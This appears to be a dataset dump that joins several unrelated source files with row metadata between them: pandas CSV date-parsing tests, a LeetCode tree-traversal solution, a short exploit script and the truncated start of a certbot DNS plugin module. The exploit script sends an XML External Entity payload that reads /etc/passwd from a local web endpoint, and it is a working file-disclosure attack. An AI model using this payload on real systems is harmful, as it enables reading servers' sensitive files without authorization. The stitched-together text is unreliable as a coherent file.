parser = all_parsers
result = parser.read_csv(StringIO(data), header=None, prefix="X",
parse_dates=[1], index_col=1)
index = Index([datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 20, 0),
datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 0),
datetime(1999, 1, 27, 22, 0)], name="X1")
expected = DataFrame([
["KORD", " 18:56:00", 0.81, 2.81, 7.2, 0.0, 280.0],
["KORD", " 19:56:00", 0.01, 2.21, 7.2, 0.0, 260.0],
["KORD", " 20:56:00", -0.59, 2.21, 5.7, 0.0, 280.0],
["KORD", " 21:18:00", -0.99, 2.01, 3.6, 0.0, 270.0],
["KORD", " 21:56:00", -0.59, 1.71, 5.1, 0.0, 290.0],
], columns=["X0", "X2", "X3", "X4", "X5", "X6", "X7"], index=index)
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_int_cast(all_parsers):
data = ("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
"KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
"KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
"KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
"KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
"KORD,19990127, 23:00:00, 22:56:00, -0.5900")
parse_dates = {"actual": [1, 2], "nominal": [1, 3]}
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None,
date_parser=conv.parse_date_time,
parse_dates=parse_dates, prefix="X")
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", 0.81],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", 0.01],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", -0.99],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", -0.59],
], columns=["actual", "nominal", "X0", "X4"])
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
def test_multiple_date_col_timestamp_parse(all_parsers):
parser = all_parsers
data = """05/31/2012,15:30:00.029,1306.25,1,E,0,,1306.25
05/31/2012,15:30:00.029,1306.25,8,E,0,,1306.25"""
result = parser.read_csv(StringIO(data), parse_dates=[[0, 1]],
header=None, date_parser=Timestamp)
expected = DataFrame([
[Timestamp("05/31/2012, 15:30:00.029"),
1306.25, 1, "E", 0, np.nan, 1306.25],
[Timestamp("05/31/2012, 15:30:00.029"),
1306.25, 8, "E", 0, np.nan, 1306.25]
], columns=["0_1", 2, 3, 4, 5, 6, 7])
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_with_header(all_parsers):
parser = all_parsers
data = """\
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000"""
result = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]})
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "ActualTime", "TDew",
"TAir", "Windspeed", "Precip", "WindDir"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,parse_dates,msg", [
("""\
date_NominalTime,date,NominalTime
KORD1,19990127, 19:00:00
KORD2,19990127, 20:00:00""", [[1, 2]], ("New date column already "
"in dict date_NominalTime")),
("""\
ID,date,nominalTime
KORD,19990127, 19:00:00
KORD,19990127, 20:00:00""", dict(ID=[1, 2]), "Date column ID already in dict")
])
def test_multiple_date_col_name_collision(all_parsers, data, parse_dates, msg):
parser = all_parsers
with pytest.raises(ValueError, match=msg):
parser.read_csv(StringIO(data), parse_dates=parse_dates)
def test_date_parser_int_bug(all_parsers):
parser = all_parsers
data = ("posix_timestamp,elapsed,sys,user,queries,query_time,rows,"
"accountid,userid,contactid,level,silo,method\n"
"1343103150,0.062353,0,4,6,0.01690,3,"
"12345,1,-1,3,invoice_InvoiceResource,search\n")
result = parser.read_csv(
StringIO(data), index_col=0, parse_dates=[0],
date_parser=lambda x: datetime.utcfromtimestamp(int(x)))
expected = DataFrame([[0.062353, 0, 4, 6, 0.01690, 3, 12345, 1, -1,
3, "invoice_InvoiceResource", "search"]],
columns=["elapsed", "sys", "user", "queries",
"query_time", "rows", "accountid",
"userid", "contactid", "level",
"silo", "method"],
index=Index([Timestamp("2012-07-24 04:12:30")],
name="posix_timestamp"))
tm.assert_frame_equal(result, expected)
def test_nat_parse(all_parsers):
parser = all_parsers
df = DataFrame(dict({"A": np.asarray(lrange(10), dtype="float64"),
"B": pd.Timestamp("20010101")}))
df.iloc[3:6, :] = np.nan
with tm.ensure_clean("__nat_parse_.csv") as path:
df.to_csv(path)
result = parser.read_csv(path, index_col=0, parse_dates=["B"])
tm.assert_frame_equal(result, df)
def test_csv_custom_parser(all_parsers):
data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(
StringIO(data),
date_parser=lambda x: datetime.strptime(x, "%Y%m%d"))
expected = parser.read_csv(StringIO(data), parse_dates=True)
tm.assert_frame_equal(result, expected)
def test_parse_dates_implicit_first_col(all_parsers):
data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), parse_dates=True)
expected = parser.read_csv(StringIO(data), index_col=0,
parse_dates=True)
tm.assert_frame_equal(result, expected)
def test_parse_dates_string(all_parsers):
data = """date,A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col="date",
parse_dates=["date"])
index = date_range("1/1/2009", periods=3)
index.name = "date"
expected = DataFrame({"A": ["a", "b", "c"], "B": [1, 3, 4],
"C": [2, 4, 5]}, index=index)
tm.assert_frame_equal(result, expected)
@pytest.mark.xfail(reason="yearfirst is not surfaced in read_*")
@pytest.mark.parametrize("parse_dates", [
[["date", "time"]],
[[0, 1]]
])
def test_yy_format_with_year_first(all_parsers, parse_dates):
data = """date,time,B,C
090131,0010,1,2
090228,1020,3,4
090331,0830,5,6
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=0,
parse_dates=parse_dates)
index = DatetimeIndex([datetime(2009, 1, 31, 0, 10, 0),
datetime(2009, 2, 28, 10, 20, 0),
datetime(2009, 3, 31, 8, 30, 0)],
dtype=object, name="date_time")
expected = DataFrame({"B": [1, 3, 5], "C": [2, 4, 6]}, index=index)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("parse_dates", [[0, 2], ["a", "c"]])
def test_parse_dates_column_list(all_parsers, parse_dates):
data = "a,b,c\n01/01/2010,1,15/02/2010"
parser = all_parsers
expected = DataFrame({"a": [datetime(2010, 1, 1)], "b": [1],
"c": [datetime(2010, 2, 15)]})
expected = expected.set_index(["a", "b"])
result = parser.read_csv(StringIO(data), index_col=[0, 1],
parse_dates=parse_dates, dayfirst=True)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("index_col", [[0, 1], [1, 0]])
def test_multi_index_parse_dates(all_parsers, index_col):
data = """index1,index2,A,B,C
20090101,one,a,1,2
20090101,two,b,3,4
20090101,three,c,4,5
20090102,one,a,1,2
20090102,two,b,3,4
20090102,three,c,4,5
20090103,one,a,1,2
20090103,two,b,3,4
20090103,three,c,4,5
"""
parser = all_parsers
index = MultiIndex.from_product([
(datetime(2009, 1, 1), datetime(2009, 1, 2),
datetime(2009, 1, 3)), ("one", "two", "three")],
names=["index1", "index2"])
# Out of order.
if index_col == [1, 0]:
index = index.swaplevel(0, 1)
expected = DataFrame([["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
["a", 1, 2], ["b", 3, 4], ["c", 4, 5]],
columns=["A", "B", "C"], index=index)
result = parser.read_csv(StringIO(data), index_col=index_col,
parse_dates=True)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [
dict(dayfirst=True), dict(day_first=True)
])
def test_parse_dates_custom_euro_format(all_parsers, kwargs):
parser = all_parsers
data = """foo,bar,baz
31/01/2010,1,2
01/02/2010,1,NA
02/02/2010,1,2
"""
if "dayfirst" in kwargs:
df = parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
date_parser=lambda d: parse_date(d, **kwargs),
header=0, index_col=0, parse_dates=True,
na_values=["NA"])
exp_index = Index([datetime(2010, 1, 31), datetime(2010, 2, 1),
datetime(2010, 2, 2)], name="time")
expected = DataFrame({"Q": [1, 1, 1], "NTU": [2, np.nan, 2]},
index=exp_index, columns=["Q", "NTU"])
tm.assert_frame_equal(df, expected)
else:
msg = "got an unexpected keyword argument 'day_first'"
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
date_parser=lambda d: parse_date(d, **kwargs),
skiprows=[0], index_col=0, parse_dates=True,
na_values=["NA"])
def test_parse_tz_aware(all_parsers):
# See gh-1693
parser = all_parsers
data = "Date,x\n2012-06-13T01:39:00Z,0.5"
result = parser.read_csv(StringIO(data), index_col=0,
parse_dates=True)
expected = DataFrame({"x": [0.5]}, index=Index([Timestamp(
"2012-06-13 01:39:00+00:00")], name="Date"))
tm.assert_frame_equal(result, expected)
assert result.index.tz is pytz.utc
@pytest.mark.parametrize("parse_dates,index_col", [
({"nominal": [1, 2]}, "nominal"),
({"nominal": [1, 2]}, 0),
([[1, 2]], 0),
])
def test_multiple_date_cols_index(all_parsers, parse_dates, index_col):
parser = all_parsers
data = """
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD1,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD2,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD3,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD4,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD5,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD6,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD1", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD2", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD3", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD4", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD5", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD6", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "ActualTime", "TDew",
"TAir", "Windspeed", "Precip", "WindDir"])
expected = expected.set_index("nominal")
if not isinstance(parse_dates, dict):
expected.index.name = "date_NominalTime"
result = parser.read_csv(StringIO(data), parse_dates=parse_dates,
index_col=index_col)
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_chunked(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "actualTime", "A", "B", "C", "D", "E"])
expected = expected.set_index("nominal")
reader = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]},
index_col="nominal", chunksize=2)
chunks = list(reader)
tm.assert_frame_equal(chunks[0], expected[:2])
tm.assert_frame_equal(chunks[1], expected[2:4])
tm.assert_frame_equal(chunks[2], expected[4:])
def test_multiple_date_col_named_index_compat(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
with_indices = parser.read_csv(StringIO(data),
parse_dates={"nominal": [1, 2]},
index_col="nominal")
with_names = parser.read_csv(StringIO(data), index_col="nominal",
parse_dates={"nominal": [
"date", "nominalTime"]})
tm.assert_frame_equal(with_indices, with_names)
def test_multiple_date_col_multiple_index_compat(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
result = parser.read_csv(StringIO(data), index_col=["nominal", "ID"],
parse_dates={"nominal": [1, 2]})
expected = parser.read_csv(StringIO(data),
parse_dates={"nominal": [1, 2]})
expected = expected.set_index(["nominal", "ID"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [dict(), dict(index_col="C")])
def test_read_with_parse_dates_scalar_non_bool(all_parsers, kwargs):
# see gh-5636
parser = all_parsers
msg = ("Only booleans, lists, and dictionaries "
"are accepted for the 'parse_dates' parameter")
data = """A,B,C
1,2,2003-11-1"""
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), parse_dates="C", **kwargs)
@pytest.mark.parametrize("parse_dates", [
(1,), np.array([4, 5]), {1, 3, 3}
])
def test_read_with_parse_dates_invalid_type(all_parsers, parse_dates):
parser = all_parsers
msg = ("Only booleans, lists, and dictionaries "
"are accepted for the 'parse_dates' parameter")
data = """A,B,C
1,2,2003-11-1"""
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), parse_dates=(1,))
def test_parse_dates_empty_string(all_parsers):
# see gh-2263
parser = all_parsers
data = "Date,test\n2012-01-01,1\n,2"
result = parser.read_csv(StringIO(data), parse_dates=["Date"],
na_filter=False)
expected = DataFrame([[datetime(2012, 1, 1), 1], [pd.NaT, 2]],
columns=["Date", "test"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
("a\n04.15.2016", dict(parse_dates=["a"]),
DataFrame([datetime(2016, 4, 15)], columns=["a"])),
("a\n04.15.2016", dict(parse_dates=True, index_col=0),
DataFrame(index=DatetimeIndex(["2016-04-15"], name="a"))),
("a,b\n04.15.2016,09.16.2013", dict(parse_dates=["a", "b"]),
DataFrame([[datetime(2016, 4, 15), datetime(2013, 9, 16)]],
columns=["a", "b"])),
("a,b\n04.15.2016,09.16.2013", dict(parse_dates=True, index_col=[0, 1]),
DataFrame(index=MultiIndex.from_tuples(
[(datetime(2016, 4, 15), datetime(2013, 9, 16))], names=["a", "b"]))),
])
def test_parse_dates_no_convert_thousands(all_parsers, data, kwargs, expected):
# see gh-14066
parser = all_parsers
result = parser.read_csv(StringIO(data), thousands=".", **kwargs)
tm.assert_frame_equal(result, expected)
def test_parse_date_time_multi_level_column_name(all_parsers):
data = """\
D,T,A,B
date, time,a,b
2001-01-05, 09:00:00, 0.0, 10.
2001-01-06, 00:00:00, 1.0, 11.
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), header=[0, 1],
parse_dates={"date_time": [0, 1]},
date_parser=conv.parse_date_time)
expected_data = [[datetime(2001, 1, 5, 9, 0, 0), 0., 10.],
[datetime(2001, 1, 6, 0, 0, 0), 1., 11.]]
expected = DataFrame(expected_data,
columns=["date_time", ("A", "a"), ("B", "b")])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
("""\
date,time,a,b
2001-01-05, 10:00:00, 0.0, 10.
2001-01-05, 00:00:00, 1., 11.
""", dict(header=0, parse_dates={"date_time": [0, 1]}),
DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10],
[datetime(2001, 1, 5, 0, 0, 0), 1.0, 11.0]],
columns=["date_time", "a", "b"])),
(("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
"KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
"KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
"KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
"KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
"KORD,19990127, 23:00:00, 22:56:00, -0.5900"),
dict(header=None, parse_dates={"actual": [1, 2], "nominal": [1, 3]}),
DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", 0.81],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", 0.01],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", -0.99],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", -0.59]], columns=["actual", "nominal", 0, 4])),
])
def test_parse_date_time(all_parsers, data, kwargs, expected):
parser = all_parsers
result = parser.read_csv(StringIO(data), date_parser=conv.parse_date_time,
**kwargs)
# Python can sometimes be flaky about how
# the aggregated columns are entered, so
# this standardizes the order.
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
def test_parse_date_fields(all_parsers):
parser = all_parsers
data = ("year,month,day,a\n2001,01,10,10.\n"
"2001,02,1,11.")
result = parser.read_csv(StringIO(data), header=0,
parse_dates={"ymd": [0, 1, 2]},
date_parser=conv.parse_date_fields)
expected = DataFrame([[datetime(2001, 1, 10), 10.],
[datetime(2001, 2, 1), 11.]], columns=["ymd", "a"])
tm.assert_frame_equal(result, expected)
def test_parse_date_all_fields(all_parsers):
parser = all_parsers
data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0,0.0,10.
2001,01,5,10,0,00,1.,11.
"""
result = parser.read_csv(StringIO(data), header=0,
date_parser=conv.parse_all_fields,
parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10.0],
[datetime(2001, 1, 5, 10, 0, 0), 1.0, 11.0]],
columns=["ymdHMS", "a", "b"])
tm.assert_frame_equal(result, expected)
def test_datetime_fractional_seconds(all_parsers):
parser = all_parsers
data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0.123456,0.0,10.
2001,01,5,10,0,0.500000,1.,11.
"""
result = parser.read_csv(StringIO(data), header=0,
date_parser=conv.parse_all_fields,
parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0,
microsecond=123456), 0.0, 10.0],
[datetime(2001, 1, 5, 10, 0, 0,
microsecond=500000), 1.0, 11.0]],
columns=["ymdHMS", "a", "b"])
tm.assert_frame_equal(result, expected)
def test_generic(all_parsers):
parser = all_parsers
data = "year,month,day,a\n2001,01,10,10.\n2001,02,1,11."
result = parser.read_csv(StringIO(data), header=0,
parse_dates={"ym": [0, 1]},
date_parser=lambda y, m: date(year=int(y),
month=int(m),
day=1))
expected = DataFrame([[date(2001, 1, 1), 10, 10.],
[date(2001, 2, 1), 1, 11.]],
columns=["ym", "day", "a"])
tm.assert_frame_equal(result, expected)
def test_date_parser_resolution_if_not_ns(all_parsers):
# see gh-10245
parser = all_parsers
data = """\
date,time,prn,rxstatus
2013-11-03,19:00:00,126,00E80000
2013-11-03,19:00:00,23,00E80000
2013-11-03,19:00:00,13,00E80000
"""
def date_parser(dt, time):
return np_array_datetime64_compat(dt + "T" + time + "Z",
dtype="datetime64[s]")
result = parser.read_csv(StringIO(data), date_parser=date_parser,
parse_dates={"datetime": ["date", "time"]},
index_col=["datetime", "prn"])
datetimes = np_array_datetime64_compat(["2013-11-03T19:00:00Z"] * 3,
dtype="datetime64[s]")
expected = DataFrame(data={"rxstatus": ["00E80000"] * 3},
index=MultiIndex.from_tuples(
[(datetimes[0], 126), (datetimes[1], 23),
(datetimes[2], 13)], names=["datetime", "prn"]))
tm.assert_frame_equal(result, expected)
def test_parse_date_column_with_empty_string(all_parsers):
# see gh-6428
parser = all_parsers
data = "case,opdate\n7,10/18/2006\n7,10/18/2008\n621, "
result = parser.read_csv(StringIO(data), parse_dates=["opdate"])
expected_data = [[7, "10/18/2006"],
[7, "10/18/2008"],
[621, " "]]
expected = DataFrame(expected_data, columns=["case", "opdate"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,expected", [
("a\n135217135789158401\n1352171357E+5",
DataFrame({"a": [135217135789158401,
135217135700000]}, dtype="float64")),
("a\n99999999999\n123456789012345\n1234E+0",
DataFrame({"a": [99999999999,
123456789012345,
1234]}, dtype="float64"))
])
@pytest.mark.parametrize("parse_dates", [True, False])
def test_parse_date_float(all_parsers, data, expected, parse_dates):
# see gh-2697
#
# Date parsing should fail, so we leave the data untouched
# (i.e. float precision should remain unchanged).
parser = all_parsers
result = parser.read_csv(StringIO(data), parse_dates=parse_dates)
tm.assert_frame_equal(result, expected)
def test_parse_timezone(all_parsers):
# see gh-22256
parser = all_parsers
data = """dt,val
2018-01-04 09:01:00+09:00,23350
2018-01-04 09:02:00+09:00,23400
2018-01-04 09:03:00+09:00,23400
2018-01-04 09:04:00+09:00,23400
2018-01-04 09:05:00+09:00,23400"""
result = parser.read_csv(StringIO(data), parse_dates=["dt"])
dti = pd.date_range(start="2018-01-04 09:01:00",
end="2018-01-04 09:05:00", freq="1min",
tz=pytz.FixedOffset(540))
expected_data = {"dt": dti, "val": [23350, 23400, 23400, 23400, 23400]}
expected = DataFrame(expected_data)
tm.assert_frame_equal(result, expected)
| true | true |
f71905580a519f932cc674741f730cc9139a87df | 833 | py | Python | Dataset/Leetcode/valid/102/204.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/valid/102/204.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/valid/102/204.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution:
def XXX(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
#思想就是使用队列辅助,首先根节点入队,然后开始循环,当队列不为空,不停的出队并将出队节点的左右节点入队
res=[]
q=[root]
count1,count2=1,0
#主要问题就是这个输出格式有点脑瘫,非得一层一起输出,所以这里定义两个变量count1,count2,为什么定两个,可以理解成一个用来统计下一层有多少节点,一个用来在输出这一层的时候遍历,这一层输出完要进入下一层的时候更新一下变量值
while q:
temp=[] #临时数组,用来储存这一层的所有节点
for _ in range(count1): #遍历这一层的所有节点
p=q.pop(0)
temp.append(p.val)
if p.left:
q.append(p.left)
count2+=1 #统计下一层的节点数
if p.right:
q.append(p.right)
count2+=1 #统计下一层的节点数
res.append(temp)
count1,count2=count2,0 #进入下一层,更新变量值
return res
| 33.32 | 124 | 0.521008 | class Solution:
def XXX(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
res=[]
q=[root]
count1,count2=1,0
while q:
temp=[]
for _ in range(count1):
p=q.pop(0)
temp.append(p.val)
if p.left:
q.append(p.left)
count2+=1
if p.right:
q.append(p.right)
count2+=1
res.append(temp)
count1,count2=count2,0
return res
| true | true |
f719056e15b29ef4606019d3603298ad5627461c | 314 | py | Python | exploits/xml_exploit.py | denny00786/CASoftwareDevelopment | d03c82b6bb033a39b4270115ec464eca773e0814 | [
"Apache-2.0"
] | 1 | 2020-04-02T00:29:16.000Z | 2020-04-02T00:29:16.000Z | exploits/xml_exploit.py | denny00786/CASoftwareDevelopment | d03c82b6bb033a39b4270115ec464eca773e0814 | [
"Apache-2.0"
] | null | null | null | exploits/xml_exploit.py | denny00786/CASoftwareDevelopment | d03c82b6bb033a39b4270115ec464eca773e0814 | [
"Apache-2.0"
] | 4 | 2021-04-01T21:31:01.000Z | 2022-03-23T08:22:44.000Z | import requests
url = 'http://localhost/xml'
shellcode = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
'''
data = {'input_data': shellcode}
response = requests.post(url, data=data)
print(response.text)
| 15.7 | 58 | 0.640127 | import requests
url = 'http://localhost/xml'
shellcode = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
'''
data = {'input_data': shellcode}
response = requests.post(url, data=data)
print(response.text)
| true | true |
f71905d79157038348e3b499a02d4481fdbe417c | 11,471 | py | Python | certbot/plugins/dns_common.py | aaroncohen/certbot | c3434bac26592585d12feb781a87f3e2be846e42 | [
"Apache-2.0"
] | 1 | 2018-09-12T03:07:11.000Z | 2018-09-12T03:07:11.000Z | certbot/plugins/dns_common.py | 978740431/certbot | c3434bac26592585d12feb781a87f3e2be846e42 | [
"Apache-2.0"
] | null | null | null | certbot/plugins/dns_common.py | 978740431/certbot | c3434bac26592585d12feb781a87f3e2be846e42 | [
"Apache-2.0"
] | null | null | null | """Common code for DNS Authenticator Plugins."""
import abc
import logging
import os
import stat
from time import sleep
import configobj
import zope.interface
from acme import challenges
from certbot import errors
from certbot import interfaces
from certbot.display import ops
from certbot.display import util as display_util
from certbot.plugins import common
logger = logging.getLogger(__name__)
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class DNSAuthenticator(common.Plugin):
"""Base class for DNS Authenticators"""
def __init__(self, config, name):
super(DNSAuthenticator, self).__init__(config, name)
self._attempt_cleanup = False
@classmethod
def add_parser_arguments(cls, add, default_propagation_seconds=10): # pylint: disable=arguments-differ
add('propagation-seconds',
default=default_propagation_seconds,
type=int,
help='The number of seconds to wait for DNS to propagate before asking the ACME server '
'to verify the DNS record.')
def get_chall_pref(self, unused_domain): # pylint: disable=missing-docstring,no-self-use
return [challenges.DNS01]
